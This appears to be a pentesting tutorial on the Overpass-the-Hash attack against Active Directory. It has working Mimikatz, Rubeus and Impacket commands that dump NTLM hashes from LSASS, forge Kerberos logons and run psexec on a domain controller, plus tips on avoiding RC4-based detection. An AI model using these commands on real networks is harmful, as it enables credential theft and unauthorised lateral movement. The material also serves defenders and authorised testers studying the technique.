# Overpass the Hash Attack

### Overview

**Overpass-the-Hash (OPtH)** is an Active Directory attack technique in which an attacker uses a stolen NTLM hash as the user's Kerberos key to request a Ticket Granting Ticket (TGT) from a Domain Controller, instead of authenticating directly with NTLM as in traditional Pass-the-Hash. When an AES key is used in place of the NT hash the same technique is usually called Pass-the-Key.

In simpler terms:

* **Pass-the-Hash (PtH)** → uses the NTLM hash to authenticate to services directly over NTLM.
* **Overpass-the-Hash (OPtH)** → uses the NTLM hash to obtain a Kerberos TGT, then authenticates with Kerberos: the TGT is exchanged at the DC for a service ticket (TGS-REQ/TGS-REP) for each resource you touch.

### Why this Works

If you possess:

```
User NTLM hash
```

You can:

```
Use it as the RC4-HMAC (etype 23) Kerberos key: that key IS the NT hash, MD4 over the UTF-16LE password, with no salt
→ Encrypt the pre-authentication timestamp with it and send an AS-REQ to the Domain Controller
→ Receive a valid Kerberos TGT (AS-REP)
→ Exchange the TGT for service tickets and access domain resources
```

The Domain Controller does NOT know whether:

* The user typed their password (their client derived exactly the same key from it)
* Or the attacker supplied the NTLM hash directly

Two caveats a practitioner should keep in mind:

* The NT hash only gives you the RC4 key. The AES keys (etypes 17/18) are derived from the password with a salt (realm + username), so they cannot be computed from the hash; if you dumped them instead (`sekurlsa::ekeys`), use `/aes256:` rather than `/ntlm:` in Mimikatz or Rubeus.
* Using the RC4 key makes the AS-REQ ask for etype 0x17, while a Windows client in a current domain negotiates AES (0x12). That difference is visible in event 4768 on the DC and is the standard detection for this technique.

### Prerequisites

1. A valid domain user account
2. The NTLM hash of that user (dumped from LSASS, the SAM or NTDS.dit, or obtained another way)

Example of dumping the hash from LSASS on a host where the user has a logon session (requires local admin for `privilege::debug`; `sekurlsa::ekeys` additionally lists the Kerberos AES keys):

```
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
```

### Steps

Once you have the NTLM hash of the account, request a TGT with it. Three equivalent routes:

**Mimikatz (`sekurlsa::pth`)** starts a new process whose logon session carries the NT hash as its Kerberos RC4 key (it needs `privilege::debug`, i.e. local admin). No ticket is requested at this point; the TGT and the service ticket are fetched the first time the new process touches a Kerberos-protected resource, so an immediate `klist` is empty.

```
sekurlsa::pth /user:jeff /domain:corp.com /ntlm:<NTLM_HASH> /run:cmd.exe
sekurlsa::pth /user:jeff /domain:corp.com /ntlm:<NTLM_HASH> /run:powershell
```

In the spawned `cmd.exe` / `powershell` window:

```
klist          # empty: pth only swapped the key material
dir \\DC1\C$   # triggers the AS-REQ (TGT) and a TGS-REQ for cifs/DC1
klist          # now lists jeff's TGT and the cifs/DC1 service ticket
```

**Rubeus** requests the TGT itself and, with `/ptt`, injects it into the current logon session, which needs no admin rights. Prefer `/aes256:<AES_KEY>` over `/rc4:<NTLM_HASH>` when you have the AES key, because the RC4 request stands out in a domain that defaults to AES.

```
Rubeus.exe asktgt /user:jeff /domain:corp.com /rc4:<NTLM_HASH> /ptt
```

**Impacket (from Linux)** saves the TGT to a ccache file that the other Impacket tools pick up from `KRB5CCNAME`. Kerberos is picky here: your clock must be within 5 minutes of the DC, the domain and target names must resolve (DNS or `/etc/hosts`), and the target must be addressed by FQDN so the SPN in the TGS-REQ matches.

```bash
impacket-getTGT corp.com/jeff -hashes :<NTLM_HASH>        # LM half left empty, NT half is the key; writes jeff.ccache
export KRB5CCNAME=jeff.ccache
impacket-psexec -k -no-pass corp.com/jeff@dc1.corp.com     # -k: authenticate with the ccache, -no-pass: don't prompt
```

### PTH vs OPTH

***Q) If I have the NTLM hash, why not just use impacket-psexec or other tools and move on?***

You *can*. But **Overpass-the-Hash (OPtH)** isn't about "can I authenticate?", it's about **how** you authenticate and what that enables.

Overpass-the-Hash converts your NTLM hash → Kerberos TGT, and that changes your operational capabilities significantly.

Some environments disable NTLM entirely or restrict it via GPO (the "Network security: Restrict NTLM" policies). Where NTLM is disabled on the servers you want to reach, or where outgoing NTLM traffic is audited, `psexec -hashes` fails or gets flagged, while a Kerberos ticket is what every other client on the network presents anyway.

Also, many advanced AD attacks are Kerberos-native: they start from a TGT or produce one, and never touch NTLM:

* S4U2Self and S4U2Proxy, and therefore constrained delegation abuse and RBCD (Resource-Based Constrained Delegation), which need a TGT for the service account
* Kerberoasting, which needs a TGT to request the service tickets it cracks
* Diamond ticket operations, which start from a legitimately issued TGT
* Shadow credentials abuse and ADCS abuse workflows, which end in PKINIT and hand you a TGT

